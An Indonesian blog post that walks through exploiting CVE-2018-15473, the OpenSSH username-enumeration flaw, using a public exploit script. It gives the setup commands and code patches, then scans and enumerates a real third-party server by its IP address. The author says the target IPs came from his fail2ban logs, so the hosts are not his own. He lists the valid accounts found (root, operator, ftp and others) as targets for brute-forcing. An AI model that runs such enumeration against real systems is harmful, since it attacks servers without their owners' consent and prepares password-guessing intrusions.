Enum User Terhadap Nama Pengguna di OpenSSH atau lebih dikenal dengan CVE-2018-15473 adalah kerentanan pada OpenSSH versi hingga 7.7 yang memungkinkan penyerang melakukan enumerasi nama pengguna. Kerentanan ini terjadi karena server OpenSSH merespons secara berbeda terhadap upaya autentikasi dengan nama pengguna yang valid dan tidak valid, sehingga memungkinkan penyerang menentukan apakah nama pengguna tertentu ada di sistem target.
Cara kerja dari kerentanan ini: Deskripsi Kerentanan: CVE-2018-15473 terjadi karena OpenSSH tidak secara konsisten memvalidasi nama pengguna yang tidak valid selama proses otentikasi. Penyerang dapat mengirimkan permintaan otentikasi dengan nama pengguna yang berbeda-beda untuk mencoba menemukan apakah nama pengguna tersebut valid atau tidak.
Proses Otentikasi: Ketika pengguna mencoba untuk masuk ke sistem menggunakan SSH, server OpenSSH memberikan umpan balik tentang validitas nama pengguna yang diberikan. Jika nama pengguna tidak valid, server bisa memberikan informasi bahwa otentikasi gagal tanpa memberikan informasi lebih lanjut.
Metode Serangan: Penyerang dapat menggunakan informasi ini untuk membangun daftar nama pengguna yang valid. Dengan mencoba berbagai nama pengguna dan mencatat respon dari server, mereka dapat mengetahui nama pengguna yang ada di sistem.
Sekedar info saja, bagi kalian yang ingin pentest bisa menggunakan data IP dari Alamat IP dan Vulnerable nya bagus untuk uji pentest yang sengaja saya kumpulkan dari fail2ban di server VPS saya sendiri. Adapun CVE-2018-15473 merupakan kerentanan yang sudah sangat lama sehingga akan ada banyak penyesuaian.
Kita akan menggunakan kode python 2.7 untuk menjalankan script http://git clone https://github.com/Rhynorater/CVE-2018-15473-Exploit.git, saya sangat menyarankan kalian menggunakan virtual environment Install Python 2.7 dan 3.8
conda create -n py27 python=2.7
setelah menggunakan perintah diatas, aktivasi
conda activate py27
sekarang kita akan menuju directory CVE-2018-15473-Exploit untuk install modul-modulnya
cd CVE-2018-15473-Exploit
ketikan perintah berikut agar menggunakan paramiko versi lawas
pip install paramiko==2.4.2
selanjutnya sshUsernameEnumExploit.py masih menggunakan perintah lawas, perlu sedikit edit saja
lama
old_parse_service_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
ganti menjadi
old_parse_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table.get(
paramiko.common.MSG_SERVICE_ACCEPT
)
kemudian
paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = malform_packet paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = call_error
ganti menjadi
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = malform_packet paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = call_error
kemudian simpan
Perintah yang digunakan sebagai berikut
usage: sshUsernameEnumExploit.py [-h] [--port PORT] [--threads THREADS]
[--outputFile OUTPUTFILE]
[--outputFormat {list,json,csv}]
(--username USERNAME | --userList USERLIST)
hostname
hemm menarik sekali, langsung saja kita pakai data dari Alamat IP dan Vulnerable nya bagus untuk uji pentest cari yang mengandung CVE-2018-15473, misalkan pada IP 170.79.37.84
Mari kita uji versi server diatas
nmap -sV -p 22 170.79.37.84
hasilnya
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-04 20:14 WIB Nmap scan report for ocweb.monitoreotdp.com.pe (170.79.37.84) Host is up (0.35s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
atau menggunakan perintah
ssh -v 170.79.37.84
hasilnya
OpenSSH_8.6p1, LibreSSL 3.3.6 debug1: Reading configuration data /etc/ssh/ssh_config debug1: /etc/ssh/ssh_config line 21: include /etc/ssh/ssh_config.d/* matched no files debug1: /etc/ssh/ssh_config line 54: Applying options for * debug1: /etc/ssh/ssh_config line 58: Applying options for * debug1: Authenticator provider $SSH_SK_PROVIDER did not resolve; disabling debug1: Connecting to 170.79.37.84 [170.79.37.84] port 22. debug1: Connection established. debug1: identity file /Users/user/.ssh/id_rsa type 0 debug1: identity file /Users/user/.ssh/id_rsa-cert type -1 debug1: identity file /Users/user/.ssh/id_dsa type -1 debug1: identity file /Users/user/.ssh/id_dsa-cert type -1 debug1: identity file /Users/user/.ssh/id_ecdsa type -1 debug1: identity file /Users/user/.ssh/id_ecdsa-cert type -1 debug1: identity file /Users/user/.ssh/id_ecdsa_sk type -1 debug1: identity file /Users/user/.ssh/id_ecdsa_sk-cert type -1 debug1: identity file /Users/user/.ssh/id_ed25519 type -1 debug1: identity file /Users/user/.ssh/id_ed25519-cert type -1 debug1: identity file /Users/user/.ssh/id_ed25519_sk type -1 debug1: identity file /Users/user/.ssh/id_ed25519_sk-cert type -1 debug1: identity file /Users/user/.ssh/id_xmss type -1 debug1: identity file /Users/user/.ssh/id_xmss-cert type -1 debug1: Local version string SSH-2.0-OpenSSH_8.6 debug1: Remote protocol version 2.0, remote software version OpenSSH_7.4 debug1: compat_banner: match: OpenSSH_7.4 pat OpenSSH_7.0*,OpenSSH_7.1*,OpenSSH_7.2*,OpenSSH_7.3*,OpenSSH_7.4*,OpenSSH_7.5*,OpenSSH_7.6*,OpenSSH_7.7* compat 0x04000002 debug1: Authenticating to 170.79.37.84:22 as 'user' debug1: load_hostkeys: fopen /Users/user/.ssh/known_hosts2: No such file or directory debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug1: kex: algorithm: curve25519-sha256 debug1: kex: host key algorithm: ssh-ed25519 debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none debug1: expecting SSH2_MSG_KEX_ECDH_REPLY debug1: SSH2_MSG_KEX_ECDH_REPLY received debug1: Server host key: ssh-ed25519 SHA256:sV0glpPfZDtGxkXpzjiFuVUh5r0zNEyVCe+8IoMsuA0 debug1: load_hostkeys: fopen /Users/user/.ssh/known_hosts2: No such file or directory debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory debug1: Host '170.79.37.84' is known and matches the ED25519 host key. debug1: Found key in /Users/user/.ssh/known_hosts:10 debug1: rekey out after 134217728 blocks debug1: SSH2_MSG_NEWKEYS sent debug1: expecting SSH2_MSG_NEWKEYS debug1: SSH2_MSG_NEWKEYS received debug1: rekey in after 134217728 blocks debug1: Will attempt key: /Users/user/.ssh/id_rsa RSA SHA256:c8zOA+X6gpnEluPY2DJs1+LP1QkWuzg+rnsEEVKErdQ debug1: Will attempt key: /Users/user/.ssh/id_dsa debug1: Will attempt key: /Users/user/.ssh/id_ecdsa debug1: Will attempt key: /Users/user/.ssh/id_ecdsa_sk debug1: Will attempt key: /Users/user/.ssh/id_ed25519 debug1: Will attempt key: /Users/user/.ssh/id_ed25519_sk debug1: Will attempt key: /Users/user/.ssh/id_xmss debug1: SSH2_MSG_EXT_INFO received debug1: kex_input_ext_info: server-sig-algs=<rsa-sha2-256,rsa-sha2-512> debug1: SSH2_MSG_SERVICE_ACCEPT received debug1: Authentications that can continue: publickey,gssapi-keyex,gssapi-with-mic,password debug1: Next authentication method: publickey debug1: Offering public key: /Users/user/.ssh/id_rsa RSA SHA256:c8zOA+X6gpnEluPY2DJs1+LP1QkWuzg+rnsEEVKErdQ debug1: Authentications that can continue: publickey,gssapi-keyex,gssapi-with-mic,password debug1: Trying private key: /Users/user/.ssh/id_dsa debug1: Trying private key: /Users/user/.ssh/id_ecdsa debug1: Trying private key: /Users/user/.ssh/id_ecdsa_sk debug1: Trying private key: /Users/user/.ssh/id_ed25519 debug1: Trying private key: /Users/user/.ssh/id_ed25519_sk debug1: Trying private key: /Users/user/.ssh/id_xmss
hemm ada sedikit perbedaan untuk
- nmap menghasilkan versi OpenSSH 7.4 (protocol 2.0)
- sedangkan ssh -v menghasilkan OpenSSH_8.6p1, LibreSSL 3.3.6
Ok, tidak masalah
saat kita membuat data userlist username ssh yang biasa digunakan, misalkan simpan dengan nama user.txt
root admin administrator guest user test ubuntu debian pi support info backup operator dev devops sysadmin postgres mysql oracle ftp ftpuser web webadmin nginx apache www www-data jenkins tomcat git gitlab gituser docker build ci bot ansible vagrant packer kali pentest scanner security monitor db dbadmin sql sqladmin hadoop spark zeppelin airflow elastic logstash kibana splunk graylog grafana influx prometheus zabbix nagios cacti nmap wireshark wiresharkuser snort suricata clamav clamuser mail mailman postfix postmaster sendmail courier dovecot roundcube zimbra samba winbind kerberos sshd ssh sshuser nologin nobody games cups lp lpd print proxy bind named dns dnsuser ntp time mysqluser mariadb mongodb mongo redis memcached solr wwwrun lighttpd lighty webuser php phpuser phpmyadmin apache2 iis nginxuser cloud clouduser azure aws
saat nya kita ketikan perintah untuk menyimpan hasilnya di out.txt
python sshUsernameEnumExploit.py --userList user.txt --outputFile out.txt 170.79.37.84
hasilnya
[+] Results successfully written to out.txt in List form.
berikut hasilnya
root is a valid user! admin is not a valid user! administrator is not a valid user! guest is not a valid user! user is not a valid user! test is not a valid user! ubuntu is not a valid user! debian is not a valid user! pi is not a valid user! support is not a valid user! info is not a valid user! backup is not a valid user! operator is a valid user! dev is not a valid user! devops is not a valid user! sysadmin is not a valid user! postgres is not a valid user! mysql is not a valid user! oracle is not a valid user! ftp is a valid user! ftpuser is not a valid user! web is not a valid user! webadmin is not a valid user! nginx is not a valid user! apache is not a valid user! www is not a valid user! www-data is not a valid user! jenkins is not a valid user! tomcat is not a valid user! git is not a valid user! gitlab is not a valid user! gituser is not a valid user! docker is not a valid user! build is not a valid user! ci is not a valid user! bot is not a valid user! ansible is not a valid user! vagrant is not a valid user! packer is not a valid user! kali is not a valid user! pentest is not a valid user! scanner is not a valid user! security is not a valid user! monitor is not a valid user! db is not a valid user! dbadmin is not a valid user! sql is not a valid user! sqladmin is not a valid user! hadoop is not a valid user! spark is not a valid user! zeppelin is not a valid user! airflow is not a valid user! elastic is not a valid user! logstash is not a valid user! kibana is not a valid user! splunk is not a valid user! graylog is not a valid user! grafana is not a valid user! influx is not a valid user! prometheus is not a valid user! zabbix is not a valid user! nagios is not a valid user! cacti is not a valid user! nmap is not a valid user! wireshark is not a valid user! wiresharkuser is not a valid user! snort is not a valid user! suricata is not a valid user! clamav is not a valid user! clamuser is not a valid user! mail is a valid user! mailman is not a valid user! postfix is a valid user! postmaster is not a valid user! sendmail is not a valid user! courier is not a valid user! dovecot is not a valid user! roundcube is not a valid user! zimbra is not a valid user! samba is not a valid user! winbind is not a valid user! kerberos is not a valid user! sshd is a valid user! ssh is not a valid user! sshuser is not a valid user! nologin is not a valid user! nobody is a valid user! games is a valid user! cups is not a valid user! lp is a valid user! lpd is not a valid user! print is not a valid user! proxy is not a valid user! bind is not a valid user! named is not a valid user! dns is not a valid user! dnsuser is not a valid user! ntp is not a valid user! time is not a valid user! mysqluser is not a valid user! mariadb is not a valid user! mongodb is not a valid user! mongo is not a valid user! redis is not a valid user! memcached is not a valid user! solr is not a valid user! wwwrun is not a valid user! lighttpd is not a valid user! lighty is not a valid user! webuser is not a valid user! php is not a valid user! phpuser is not a valid user! phpmyadmin is not a valid user! apache2 is not a valid user! iis is not a valid user! nginxuser is not a valid user! cloud is not a valid user! clouduser is not a valid user! azure is not a valid user! aws is not a valid user!
ternyata ada kerentanan dan ada user yang bisa kita bruteforce yaitu
- root
- operator
- ftp
- postfix
- sshd
- nobody
- games
- lp
Berikut kode lengkap sshUsernameEnumExploit.py yang lengkap tanpa perlu kalian edit lagi, dengan cara login terlebih dahulu ke blog ini agar tampil nanti kode nya